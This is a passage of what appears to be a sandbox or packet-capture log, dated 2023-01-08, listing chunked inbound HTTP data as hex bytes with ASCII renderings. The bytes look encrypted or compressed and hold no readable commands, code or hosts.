df 7d 2a 44 bc 1a 0b a9 93 23 40 47 5e 76 37 4f d9 0c 96 77 92 fc 46 9f 33 e5 ce 92 c3 2b c0 e2 db 27 c6 f7 fd 1f ce 78 5e df 7a ed 8c a1 9a b1 ce 35 88 fb 1f 0e a6 a3 d7 85 14 49 Data Ascii: 2000@LG&^'G#(Q%#!e4OW0{oyP=D+72ro+xOPH` i_naP}eN!0F&`o2UE#FZ~mG1[@t3J u}D#@G^v7OwF3+'x^z5I
2023-01-08 15:15:31 UTC	208	IN	Data Raw: e9 b5 4b 99 e7 4a Data Ascii: KJ
2023-01-08 15:15:31 UTC	208	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	208	IN	Data Raw: 32 30 30 30 0d 0a 4b a6 67 e3 6c f2 9b 77 89 eb c6 5d 88 41 ef 72 6c 6a 6d 72 0e 45 bd 10 e4 a1 8c 0e 78 41 dc df 2f ab df cd 3e 21 5c f8 47 14 dc 26 cc 99 e9 e4 2c 37 c2 27 b9 a1 46 da 3f e7 19 52 96 3e c7 63 4b 85 b4 4c 82 04 69 c2 29 8b 39 42 55 d8 55 52 d8 c8 a7 b0 5e 0a 61 ee 97 6a aa ea c1 4d da 3a 1f ec 68 9e 46 17 1c ff b2 8e 88 45 a6 32 37 e7 9c b1 76 e0 dd ac bc 69 0c 38 94 77 93 0e 98 37 06 12 df 65 88 93 c9 99 dd 13 9c c0 3e 45 4c ea 69 55 df f4 6b 44 d6 79 b0 0e c5 f8 97 c0 3c e2 23 15 5a 9f d2 ad 1f f4 b7 7a b7 cf 12 f7 80 da 5d 20 87 36 d4 4a 61 c0 c4 fd 08 86 d0 7d 56 68 99 64 13 51 1f 2e 4d 9f 3c 83 83 28 b8 cb 5f 95 bf 32 78 42 34 85 30 0b ec ea a6 11 78 6a 53 99 e6 f9 38 f2 18 4b bd 37 6f 81 56 a5 14 fb 96 0a 30 3a 02 32 60 bd 3c e6 76 Data Ascii: 2000Kglw]ArljmrExA/>!\G&,7'F?R>cKLi)9BUUR^ajM:hFE27vi8w7e>ELiUkDy<#Zz] 6Ja}VhdQ.M<(_2xB40xjS8K7oV0:2`<v
2023-01-08 15:15:31 UTC	216	IN	Data Raw: 86 3a 77 0f f5 25 Data Ascii: :w%
2023-01-08 15:15:31 UTC	216	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	216	IN	Data Raw: 32 30 30 30 0d 0a 31 16 24 75 e2 bd 13 6b 13 06 64 e3 b2 46 4c b0 27 bb c3 19 26 06 20 71 ad 87 c3 8c 85 57 93 49 92 3d 5d c2 2a 82 d3 0e b8 60 cf 1d f8 cd f5 04 53 6f cb 01 44 5d e2 e4 3f a9 5e d6 2d dc 06 86 b5 a1 fc 67 7d 2a 16 8b 8d 67 c4 81 6f 21 cb 3a 3f 09 00 45 4d 16 a4 f5 02 5f a0 48 aa a9 32 9b 80 33 32 6f 07 13 cb c5 bc 38 0a bb 54 b7 dc 9b e6 e9 bb db 50 f9 7b 67 95 25 c9 82 de 20 9d 06 bc c9 8e ba 38 87 f7 30 96 68 ad 05 69 43 dc ab 71 02 db 31 33 b6 2a a3 4e 25 c1 43 98 a2 95 02 21 74 7d 05 dc 60 e9 eb 1f 91 20 fb 46 4e 32 8a ac 68 f7 ff 0d 50 2a ea 24 46 d3 00 30 7f fb e0 ab a6 ab 43 04 85 9f 76 b7 ca cd b6 f4 57 a1 b4 1c d5 a3 3b 82 d9 eb be f2 aa 9e 89 ee 3d e6 ab 92 33 75 2c fa e2 fa fc 7d 30 59 5b fe f0 9f 5b 9c 95 d6 35 7b 2c 7a c7 a6 Data Ascii: 20001$ukdFL'& qWI=]`SoD]?^-g}go!:?EM_H232o8TP{g% 80hiCq13N%C!t}` FN2hP$F0CvW;=3u,}0Y[[5{,z
2023-01-08 15:15:31 UTC	224	IN	Data Raw: 25 09 e8 b1 f8 8d Data Ascii: %
2023-01-08 15:15:31 UTC	224	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	224	IN	Data Raw: 32 30 30 30 0d 0a c7 ac 3c ae 55 ca 74 d6 64 31 73 3c b2 3f 03 de 29 53 2c f7 eb e8 fd ec 0b 1a 6f bd 36 29 2d 91 b5 7c b7 a9 55 da 78 a2 3e 80 ee 36 b2 d6 a4 3f 69 50 63 7c be f6 4b 30 77 4e 6e 94 72 80 51 97 f0 46 7a 2d b6 e7 0e 1d 36 4a 21 b8 a9 f6 42 fd dc 09 d3 e2 46 d2 9c 79 44 e4 39 95 65 68 4a bc fa 1a ef 14 3f d9 18 21 8d 20 ec a6 f9 60 30 4a 2c bf d0 69 06 46 bf 7e 55 3d 4a e3 89 cd e4 67 a5 85 82 b7 a8 d3 e7 92 47 8f a7 4d ab ab 30 bb 62 d2 22 ed c5 98 60 d3 f7 81 98 af ad ef ad b4 13 12 9b b6 43 ad dc a0 d0 52 13 1a d0 6a 5d 7a cf 7f c1 c7 7b 84 5e 9c ff e4 e8 d1 f5 ae e6 e5 a8 c7 10 5a 57 0a dc 1f f0 64 0f 1e 23 5d f1 1a ad 27 99 81 b6 06 ba 50 1d 54 76 47 8e 36 94 ca 50 3a 8b 98 00 0b c5 f5 9d ff 28 c9 c4 9e b4 00 9d 1f a8 33 e1 eb 1a e0 ac Data Ascii: 2000<Utd1s<?)S,o6)-\|Ux>6?iPc\|K0wNnrQFz-6J!BFyD9ehJ?! `0J,iF~U=JgGM0b"`CRj]z{^ZWd#]'PTvG6P:(3
2023-01-08 15:15:31 UTC	232	IN	Data Raw: 6a f2 1a 31 b6 a2 Data Ascii: j1
2023-01-08 15:15:31 UTC	232	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	232	IN	Data Raw: 32 30 30 30 0d 0a b6 11 7f 87 a3 a0 78 c6 fd a9 74 a9 f5 be c7 a5 6a 45 9e ad 50 db 58 bc 2f 5f 59 25 a4 81 4c 9f aa 1d 51 a1 0d 7c 80 6d f1 fa 35 bc a3 b6 1f 0f b8 77 3b 3a 6a da 63 23 c8 27 6f c1 22 ca d8 5c 2a 66 00 d5 db 85 d1 fe 9a 4e ac ca 27 c0 0a 5b e1 8a 8f ce 6f 4f f7 8f 0d c2 b8 17 0b 65 6a 07 3b d5 72 4d 12 b0 47 de cb 83 63 00 f2 5e 14 4b 1a 0d 70 4c 96 5c ad 67 12 f1 9d 8f 09 51 69 9b a1 30 85 77 8b 9d f4 18 8b 55 31 21 cc 98 b9 eb 25 c5 08 e3 cc 0d da 71 11 55 ef fc fd 29 24 8c c1 22 d9 e7 63 3f eb 0c 16 de 04 47 1a f8 3b 08 21 14 eb be bf d4 ba 63 27 24 b9 da 8f 22 ca 12 c9 ca 6d 85 05 cf f7 24 3e ed 75 8d 83 dc b8 21 e1 dc d1 99 c7 00 62 38 3e 5d d8 f7 ef 1f 68 90 05 fc 9a a0 02 73 fc 06 09 42 b7 6d c7 18 b2 8e cb 7a e7 e7 9d 53 fb 7a f3 Data Ascii: 2000xtjEPX/_Y%LQ\|m5w;:jc#'o"\*fN'[oOej;rMGc^KpL\gQi0wU1!%qU)$"c?G;!c'$"m$>u!b8>]hsBmzSz
2023-01-08 15:15:31 UTC	240	IN	Data Raw: a3 34 9a d5 5e df Data Ascii: 4^
2023-01-08 15:15:31 UTC	240	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	240	IN	Data Raw: 32 30 30 30 0d 0a 03 5b f1 6b 8f be fe 3c 45 b0 5a d3 47 01 40 ce 89 4a 3b 12 85 9e 63 38 77 e7 50 08 7a d4 a6 ec e1 ae 9d 70 0a e6 28 30 30 32 f1 03 1d bb 09 c5 85 c8 e0 a7 37 df 15 45 56 15 2a 9f 3e f7 6f 7f f1 ce 58 c9 43 fd 3e 66 79 c4 67 d9 41 d1 e7 bb bf ba 80 d9 53 41 bf 0b 26 40 19 51 00 0b 38 ea ca f4 bc 40 00 06 7c 5e e1 3f 82 ab 86 e8 24 cd 0c 26 2a cf fe 1d 79 52 a0 77 13 1d 7e d5 a0 93 5a 5a 53 d2 fa d5 a9 9b 9d 3a a0 66 34 7b f6 6c fa 53 a3 e3 5e 2f b1 16 c4 51 41 6f 61 1a 82 6d f0 48 ce bb 67 98 c2 ff d9 eb 6a d3 68 bf 2d e5 5d c6 92 1c 13 b2 d9 37 9c d5 4f c1 c6 86 96 41 81 53 78 27 69 13 77 45 54 83 7b b8 0c 32 7e 95 dc cf 4f 82 cd da 11 95 53 45 75 47 b5 b3 1b 80 52 a3 c9 c2 06 93 3e 7b bc 8b df 91 77 a6 fb 62 f0 c5 d3 9f 6b 22 d0 13 36 Data Ascii: 2000[k<EZG@J;c8wPzp(0027EV>oXC>fygASA&@Q8@\|^?$&yRw~ZZS:f4{lS^/QAoamHgjh-]7OASx'iwET{2~OSEuGR>{wbk"6
2023-01-08 15:15:31 UTC	248	IN	Data Raw: af ce c7 79 28 28 Data Ascii: y((
2023-01-08 15:15:31 UTC	248	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	248	IN	Data Raw: 31 66 66 38 0d 0a 9d d3 6d 41 7f ec 32 12 e8 e9 06 7e aa 2f 3c 15 72 4a c6 4d 4d 52 50 50 f8 42 4f 8e 02 12 bc bf 11 9a 09 c9 0b ce 48 02 da b1 1d 5c 79 4d 6a 6f b4 9e 92 fc 60 21 eb 88 b2 20 1b 55 61 4a e7 37 8a 0f cd 7d 89 bc 9c 0d 72 40 78 10 72 71 7f 91 d1 17 17 49 b8 0c 2c 12 f3 ab 79 93 fc 61 53 b9 c2 a0 ea 29 05 f9 8a 62 c9 ab be f9 42 2f 72 54 5b cf 64 3b 12 a8 03 12 a1 be 81 b8 29 3a f0 57 23 6d d1 5b ad c0 d4 48 56 53 2f 51 cf 50 fb 30 48 4c 18 49 c7 26 a2 2d 2a 4d e1 d2 60 82 b6 c5 1b 7c 24 09 88 02 a2 3b e7 6e b0 71 f7 65 a5 e5 b5 31 6b bb b2 61 5d aa fd 97 25 04 15 c8 16 3d 2c 5f 9f 01 40 69 ed d3 aa fd c4 6b 5c 8a 0f 3f d5 bb d0 19 3b 98 e0 05 24 fe 3a 40 d4 c2 37 a4 92 d8 af b4 31 35 cb ef 51 5e 40 30 3e 19 4e 1e 3a 70 24 b2 10 99 e0 88 2b Data Ascii: 1ff8mA2~/<rJMMRPPBOH\yMjo`! UaJ7}r@xrqI,yaS)bB/rT[d;):W#m[HVS/QP0HLI&-*M`\|$;nqe1ka]%=,_@ik\?;$:@715Q^@0>N:p$+
2023-01-08 15:15:31 UTC	256	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	256	IN	Data Raw: 33 d3 4a dd 16 1a de fc 0f 23 89 07 8d 5b 1d 8e 0f ba 3b 50 11 4d 2c a5 67 30 38 28 d2 9d 82 bf 0a f3 ef 57 fe 89 7d a2 1f b3 e9 1c b2 da cb 78 ee f5 03 ac b7 9c 06 9c 76 06 fd 55 cc 57 ba a3 73 64 33 0c 92 6f ef 24 0e f1 99 78 77 de b5 ed 45 e5 f6 49 8d 2d 80 47 f3 5b 2d 7b 06 0a 8f 3c 15 67 fc b1 0c 77 93 2b 29 b1 49 61 80 f6 29 88 99 25 ef f8 6e 8d 91 45 7b b4 5d db de 74 31 e5 5a 7a 13 aa f1 90 da a5 d5 8c b6 52 2c c6 91 d7 3c 3d ce 15 de 0d 7f 48 5f 37 aa 8c fb 06 60 8f fd ad c2 5d a6 6e 9c 46 17 0d 18 bb e5 86 f0 93 bd 51 75 95 5d 79 a4 34 8d dc f4 fc 6d 74 0d 39 a2 b6 a9 7a 98 1a 51 b3 51 f6 be 59 7a 29 11 5e 8c 2e da 62 52 b5 b3 b7 a9 9b 66 ed 8b 5b 56 92 ba aa 75 c9 53 33 2f a7 e5 e4 1d 43 99 4b ac ad b8 ef a3 0e 12 5d fd 4f 7f 8e ee 68 be 3c 23 Data Ascii: 3J#[;PM,g08(W}xvUWsd3o$xwEI-G[-{<gw+)Ia)%nE{]t1ZzR,<=H_7`]nFQu]y4mt9zQQYz)^.bRf[VuS3/CK]Oh<#
2023-01-08 15:15:31 UTC	264	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	264	IN	Data Raw: 32 30 30 30 0d 0a 20 e3 f5 f5 7c 78 50 5e 34 72 fd 27 c0 22 37 91 cb 1c 4b d8 7b fd 70 d9 b8 5c 9e 56 1a 59 4b 62 25 2b 45 a9 5e b7 a3 92 11 4d a6 60 01 af f0 92 fd 77 7c 16 a8 9b 25 9e 54 ee 54 72 f6 1a 59 76 83 54 6f 38 1b 83 0e 00 31 27 bd 44 2b 97 6d 58 ec 9c 0a 57 9d 19 33 8a 7b e4 e6 5f e7 a6 db de 47 d0 18 0b ad e7 ed ac 2a 1e 38 8d 52 7d d8 0f ac 72 03 21 13 2e 8d 01 01 c7 6b a8 f5 1d 2b e3 9a 13 ae d9 41 09 73 42 4f d1 0b 8c 45 7b 96 cc a0 36 8a d9 f3 63 53 3a 7a 33 63 89 89 3f 10 12 aa 5f 6c 85 49 93 51 60 64 4d 7f c3 61 c7 a2 43 93 c4 f6 42 5d 98 4c e7 6b 63 ee ea bf fc 55 1d 64 0f 84 5d 4f fe 2f af 8b c2 64 08 aa c8 6b 93 33 68 f4 9c 2c 03 82 62 92 9f b7 07 52 93 0b 94 c2 7f d6 bd fc 38 18 5b 65 f9 92 b4 70 2a c1 e2 e0 70 0b 49 e3 78 49 d1 24 Data Ascii: 2000 \|xP^4r'"7K{p\VYKb%+E^M`w\|%TTrYvTo81'D+mXW3{_G8R}r!.k+AsBOE{6cS:z3c?_lIQ`dMaCB]LkcUd]O/dk3h,bR8[eppIxI$
2023-01-08 15:15:31 UTC	272	IN	Data Raw: 55 65 ce 9d 61 e3 Data Ascii: Uea
2023-01-08 15:15:31 UTC	272	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	272	IN	Data Raw: 32 30 30 30 0d 0a f6 9b e8 58 28 7e ed f4 57 6d c5 62 17 3a 73 ac ee 12 2f a1 2e bf b4 f0 46 fd cf 93 1a b3 74 99 29 31 17 82 39 5b 47 fe 15 9f 42 92 ea 25 1d 08 d3 74 92 b4 94 56 23 14 a9 e7 29 07 4f ff 57 2e 3a ce 67 38 40 7b 93 7f 94 ca 93 34 97 94 3a 37 1b 38 d4 60 22 d2 75 60 65 f9 42 96 c1 51 9b a7 19 be dd 25 81 99 98 0b f3 b7 13 09 7b 32 0f 23 c6 fc ad d2 5a ea fa 74 9a cf e0 65 c9 da aa 6e 26 ce 93 5a b9 8b 06 a6 94 d4 1b b1 6d bf 0d 18 7f 7a 3d 9d 1d 57 b4 65 ff 6b 00 65 ae cc ca 22 f1 ee d2 87 bb b3 57 4b 9d af e4 9e a5 ba 27 48 bc e7 fd 7b e6 22 87 ac 8c 37 c3 bf 6b d7 fe a4 c6 d0 1a eb d5 f5 97 4a ca 40 77 81 e0 2f 4c 05 85 c3 90 a2 4c 23 e0 5a a7 c8 e0 13 9a f4 51 68 40 5b a6 2d 50 d5 65 d4 c9 90 07 75 35 30 66 5a 1c c7 00 ac cf ac 59 3e 1d Data Ascii: 2000X(~Wmb:s/.Ft)19[GB%tV#)OW.:g8@{4:78`"u`eBQ%{2#Zten&Zmz=Weke"WK'H{"7kJ@w/LL#ZQh@[-Peu50fZY>
2023-01-08 15:15:31 UTC	280	IN	Data Raw: 89 5d 29 c0 30 4d Data Ascii: ])0M
2023-01-08 15:15:31 UTC	280	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	280	IN	Data Raw: 32 30 30 30 0d 0a 4a 2a 2f be 18 7f 73 b0 50 f7 a2 4a d0 ea 6b d7 03 b0 fc db 7f 2a 96 88 db af 59 f1 38 79 e6 72 97 a1 76 69 2d 8b db d5 63 c8 4d 52 63 dd 7d 63 21 df f2 e3 d4 40 34 5d 3e 67 29 69 73 07 07 59 e1 77 9d 3a 07 81 e2 dc 04 c1 90 cb d8 0e cd d1 b7 44 e5 41 c5 1f 3a a7 ae 2b 86 bf 5f 35 aa f3 1b 3a 63 db 9b e0 df fe f9 34 b5 d2 06 07 49 18 be 5d f9 a3 70 56 f9 e8 28 d7 77 64 87 56 f0 13 45 e5 6f 7f 73 63 af f9 69 46 d3 c1 e4 cc 66 5f 24 f0 c9 c3 b9 d0 70 5e a1 ba be 43 25 41 74 08 c1 10 9a ca 21 d8 60 1f 01 28 21 8f 8a a0 19 19 e3 e6 53 d8 b1 f0 c0 42 b5 af db 71 5f a2 54 97 d6 be 09 e7 59 4d 67 48 08 40 59 69 45 2e 6a 7d 61 67 68 43 8d d3 fd ed ba 30 02 14 4d a5 50 97 23 7f 5a 9f 94 81 f1 e8 24 f7 03 5b 9a fe fd f1 9d 46 41 15 ce ab 8a 30 13 Data Ascii: 2000J/sPJkY8yrvi-cMRc}c!@4]>g)isYw:DA:+_5:c4I]pV(wdVEosciFf_$p^C%At!`(!SBq_TYMgH@YiE.j}aghC0MP#Z$[FA0
2023-01-08 15:15:31 UTC	288	IN	Data Raw: ad fc 31 97 ce c5 Data Ascii: 1
2023-01-08 15:15:31 UTC	288	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	288	IN	Data Raw: 32 30 30 30 0d 0a 5b 87 5c 25 34 51 a8 d9 a9 7a 78 1f 11 46 02 2a a7 16 eb 50 92 3c 08 e3 a6 47 6d 16 63 a6 82 65 98 33 a6 85 35 6e 69 8b 76 23 01 2d c9 5e 83 09 05 e0 aa 39 44 86 dd 54 c3 df 25 9b b1 27 0c d4 f9 68 2d 5e fa 3f 9a b5 5e bd 07 f8 e9 7d aa fc da e6 22 17 a5 87 a7 2d 88 9d 42 da 30 ed de b9 ab a5 ee 53 c1 d8 63 2a 67 cc c5 f6 90 34 b3 27 4f 0d a1 5d 30 3c 5b 3b 5f 5f bc 78 7f 5f a3 c0 d8 a0 b4 52 a4 53 ad db 19 89 45 e3 d8 08 86 e1 c5 15 5a d3 3f e9 3e e0 65 29 5d 6f c9 6a ec 87 aa ba 06 35 24 68 8c 1d 7f 25 f2 1e a9 a7 a2 12 b9 8b 9a 19 d9 e6 dd bf a4 64 1a c4 50 6f 3f fe 09 f9 17 9a 91 06 be b9 38 fd d5 5f df 6a 98 79 bb b6 83 f5 52 df 36 2b ad 8a 02 e2 5d c6 30 71 57 2e ae 1f 7b f9 3b aa 00 80 a9 e9 c4 c1 1e 28 d8 be 51 18 8a 27 55 ce 18 Data Ascii: 2000[\%4QzxFP<Gmce35niv#-^9DT%'h-^?^}"-B0Scg4'O]0<[;__x_RSEZ?>e)]oj5$h%dPo?8_jyR6+]0qW.{;(Q'U
2023-01-08 15:15:31 UTC	296	IN	Data Raw: b4 70 05 b3 25 ee Data Ascii: p%
2023-01-08 15:15:31 UTC	296	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	296	IN	Data Raw: 32 30 30 30 0d 0a 51 2d 1a 09 a0 4a 72 81 31 df d7 cd 78 35 7a 92 1d cd a7 16 f8 9b 09 55 ab e8 33 6e 39 49 9b 5e df 5b de 15 bb 12 f0 d0 19 47 0e a8 ef 08 57 05 f5 0c 52 43 74 99 e1 09 2f 81 45 79 f2 4e 00 d2 e8 05 9d 21 c4 78 9a 80 87 1f 74 8f c9 8f 74 c3 d6 f4 6d 57 46 d7 ed ea 6e 13 f6 53 4e ac 19 1c f0 45 e2 ba 05 eb da fd e7 8c 4b 13 aa 10 0d f3 59 50 ae 23 fe 1d 70 c3 ad 11 5c b2 1b d0 cd a5 e5 00 eb 24 ed ff ff f1 71 79 5b 2b af c2 55 fd 11 9b 8a 68 78 be 65 19 6d 70 04 90 bf 6a dc 2a 72 5f 5e f3 09 f2 bb fa 77 50 9c 38 c6 9d c3 de cd 7e b9 ff 8a 4e 02 a7 10 14 0f fa e7 df fc 56 d5 f7 a5 90 b9 86 ff 04 cc a6 02 54 be 24 7a e1 21 8b df 6d 26 08 17 b4 f4 64 b1 9c dc 18 2c 24 81 bf 45 ba 71 b4 96 b9 55 58 f3 f2 46 d6 75 cd f4 f5 28 01 89 63 c2 92 2f Data Ascii: 2000Q-Jr1x5zU3n9I^[GWRCt/EyN!xttmWFnSNEKYP#p\$qy[+Uhxempj*r_^wP8~NVT$z!m&d,$EqUXFu(c/
2023-01-08 15:15:31 UTC	304	IN	Data Raw: 1b c1 8e 58 42 f1 Data Ascii: XB
2023-01-08 15:15:31 UTC	304	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	304	IN	Data Raw: 32 30 30 30 0d 0a 12 34 f9 45 43 96 37 f9 0f 14 0f 9c 4c b7 2c 94 c1 5f 28 97 5c 1a 63 4f c6 5e eb 72 bb 99 6c d6 67 47 b5 40 be 01 26 ee f0 a8 63 32 bb e3 c5 d9 1c 2d 9b 12 5c 37 f6 9c ce 16 e3 3a e7 c1 57 a0 93 fb 2f cf ff d8 4f 9f 98 bf 94 3d 43 90 0c 4f f8 cf 82 6e 9c 39 dc a1 fb f9 e2 ca c6 f0 e8 5b 23 96 a2 40 26 b1 e3 16 74 f9 d2 7c 4b 6d 4c 48 c8 54 ea 5d 69 bb 42 35 ae e6 d5 ab fa ec 36 d7 71 ba 99 b3 28 4a 26 84 41 c6 b4 16 83 7a 03 62 20 fd 10 f4 cb c7 f7 15 5c dd f9 ea bc 2a bb b2 49 03 07 12 06 06 5c 2d 0b f0 51 eb b6 2e ef 9c d4 ce 7e a3 6e fb df 11 72 97 3d 0b d3 de 17 76 16 70 8b 9c 7d 82 62 04 bd 9c ca 92 93 1f 89 90 58 a1 94 e9 cb 00 50 0d 8a 25 a5 08 5c 7d c8 62 b2 c5 b7 85 3a 68 38 c2 ad 49 d5 5a 9f 28 b1 09 6d 82 6e 84 e5 29 da 96 16 Data Ascii: 20004EC7L,_(\cO^rlgG@&c2-\7:W/O=COn9[#@&t\|KmLHT]iB56q(J&Azb \*I\-Q.~nr=vp}bXP%\}b:h8IZ(mn)
2023-01-08 15:15:31 UTC	312	IN	Data Raw: 17 8c c3 02 02 9d Data Ascii:
2023-01-08 15:15:31 UTC	312	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	312	IN	Data Raw: 31 66 66 38 0d 0a c2 8b 21 83 81 b7 5d 9b d8 73 26 c1 6d 1a ed 7e 6b f5 b2 ba f6 38 a1 ff d7 e8 da 88 3f b0 d1 52 fb 37 f2 02 ec 72 3e 95 ff ff 72 ba 3b fb 9b 04 2a 29 65 12 e2 f3 2a 94 dd e9 3d b6 76 ca d5 b5 86 5a 8c 2a e2 aa f9 a8 33 9c ff 26 64 52 0d 57 aa d8 5a 9a 79 86 93 9e 74 1e ca b3 02 2a 12 e1 bb 6e 50 87 57 72 c1 76 a2 aa c1 f3 88 ac 29 84 ab 85 96 b1 de 67 43 f9 ab 60 47 64 78 c3 1e 05 4c 0c 6f ce 95 74 ae 90 e2 a7 98 8a 42 02 33 77 c9 50 cd d9 12 14 55 40 15 e9 83 39 f7 1e 6d 63 0f ab 57 1c fe f8 43 76 a9 23 82 9d 3b f8 64 6b 90 a9 dd f0 f1 47 c8 54 bc 2b 05 4e a5 54 ef ce a7 da 49 a8 f4 a8 0a cf 1f b9 ee 31 a7 0b 48 a8 a2 15 5b 6f 84 db 42 9a 4b 71 68 3d 28 cd 8d 53 23 1f 6f 8f bc f7 49 95 48 9b f9 a7 aa fd 76 12 c8 73 8b 55 06 77 77 46 1a Data Ascii: 1ff8!]s&m~k8?R7r>r;)e=vZ3&dRWZytnPWrv)gC`GdxLotB3wPU@9mcWCv#;dkGT+NTI1H[oBKqh=(S#oIHvsUwwF
2023-01-08 15:15:31 UTC	320	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	320	IN	Data Raw: be e9 75 db 7a c4 f2 b8 b1 a3 ad 1b 6d 4e e6 1f 44 98 6d 29 e4 a5 43 91 42 05 9a c2 92 1b 09 5e ae a7 6a e4 c4 33 71 ba e6 13 fb 8f ce a6 bc 31 48 e4 50 7c a9 5c 6f 5c bf d9 c9 f6 f1 2c 87 aa ea fa 36 b1 bb 8f 97 4d 6e 32 8d 11 1f 21 ba f8 a4 5f ee 79 c1 8e 96 fb 6c 68 4d c5 61 aa 95 a3 33 fc 48 bb 0d a1 e1 49 ec 28 3c d0 0d 11 7a 1e 9c 92 93 97 9a 08 43 47 e2 cd 14 d5 46 2a 4e 27 0f 0f 69 7d 05 53 12 0d 29 2a 73 f5 3b 31 22 c2 d3 f6 2d b1 e0 13 78 a1 39 99 9a 30 1f b7 7b 13 b6 24 5c 22 b4 3f 34 6e d7 d6 3b 9a 8c 9b 2b 81 c0 d3 d9 86 a0 7e 61 65 a9 89 85 3d f6 da 3f 42 d8 38 e6 db 9f 13 09 8b 3a a8 ed c7 ae 68 23 f6 85 70 49 a2 62 60 ae 1f 9e 72 ed 38 02 f8 87 69 ae 9b ec 63 6c 9d a9 06 af 62 e7 5a 48 df 2e 6b 71 1b 53 fa f3 74 d1 80 f3 d9 c6 a5 3d 09 40 Data Ascii: uzmNDm)CB^j3q1HP\|\o\,6Mn2!_ylhMa3HI(<zCGFN'i}S)s;1"-x90{$\"?4n;+~ae=?B8:h#pIb`r8iclbZH.kqSt=@
2023-01-08 15:15:31 UTC	328	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	328	IN	Data Raw: 32 30 30 30 0d 0a 14 23 bb 9e c6 b5 eb 5c b0 69 26 fd 5a 3b d6 5b 2d e0 76 9b ab 20 3c d0 1b 26 c6 36 31 8b 88 c3 47 68 ed f9 6c ce 42 0a 3d b3 bb a3 46 f6 ed 95 f9 ba cb 23 d0 f4 e5 27 91 ee fd 06 96 2f 80 38 3a 72 a1 fb 33 40 81 06 38 e3 8f 17 44 63 b7 7e 3c 07 e7 a4 d3 21 ae 74 47 eb bb aa 42 d5 d5 7e 67 ec 2d f0 24 ac d5 b3 f9 07 5b ea b3 f6 12 f3 8d 65 43 23 20 be cb d5 ef b6 94 28 04 84 10 ac b6 20 ac e6 92 c9 75 fc 6d 80 ef 27 39 bc 6a 86 6c 5f 7c 76 5b 93 61 38 14 ad f5 dc a4 8d d2 96 72 7e 43 fd 30 91 35 21 35 8b ca ef 7a 5e bc c6 fa 64 59 3e 31 b4 72 22 9c 30 9e c0 5b 0e b1 6b fe b3 18 11 a3 d3 82 4c 98 fc 53 15 74 28 d8 70 3f 85 45 2b 6c 7f b5 40 8d 03 c5 b3 16 f7 3a 96 af 7c 98 35 78 96 28 b7 a4 82 74 06 9f 52 40 4d c0 cb 7c bd b2 59 45 11 bf Data Ascii: 2000#\i&Z;[-v <&61GhlB=F#'/8:r3@8Dc~<!tGB~g-$[eC# ( um'9jl_\|v[a8r~C05!5z^dY>1r"0[kLSt(p?E+l@:\|5x(tR@M\|YE
2023-01-08 15:15:31 UTC	336	IN	Data Raw: 8f ab 73 1c 78 85 Data Ascii: sx
2023-01-08 15:15:31 UTC	336	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	336	IN	Data Raw: 32 30 30 30 0d 0a 04 d5 8a 2b 29 cf 7a 18 81 82 22 97 6e 4c 38 3a 6a f0 f6 28 eb 07 44 6d ec 6a 6f 7c 5e 4c b1 cf d3 58 c2 8f 4c de 04 8a ae e9 a8 21 08 19 f4 47 8d ab ee 7a 59 8a 90 6f c3 66 c9 de 39 2a 23 2a a9 f5 5a 11 81 d4 a1 8b 4e a5 3d 30 e7 4c db 72 7d f7 30 c0 ea e3 a3 15 e2 75 54 8e 2a b1 f7 d1 1c 06 1d 42 2a 3b e4 15 04 ac 88 d3 06 d4 92 35 24 cd d9 e9 95 28 34 3c 0f 62 fd 95 f4 56 a8 49 ed a1 74 4d 8b 60 b8 5c 95 f2 7a 57 a5 92 da d0 fa 8f df b1 13 02 6e f0 d4 f9 40 42 52 5c a9 c1 04 69 a6 45 a9 86 57 8e a7 9c a9 dc c9 89 1b e3 cf fe ac a6 fc a6 bd f0 7a c0 53 22 f3 53 e9 ff ba ab fa f1 9d ee f2 fa c9 12 89 b2 66 3d 8e 7b 1f 67 a4 36 53 9d 02 ab dd ba 77 1c 21 80 2b 67 d8 92 8c 5b 4b 0f db 59 52 4c 58 45 47 02 d0 3e 0d 5a 81 91 ee 0d d3 b5 20 Data Ascii: 2000+)z"nL8:j(Dmjo\|^LXL!GzYof9#ZN=0Lr}0uTB;5$(4<bVItM`\zWn@BR\iEWzS"Sf={g6Sw!+g[KYRLXEG>Z
2023-01-08 15:15:31 UTC	344	IN	Data Raw: b6 a3 11 04 67 f1 Data Ascii: g
2023-01-08 15:15:31 UTC	344	IN	Data Raw: 0d 0a Data Ascii:
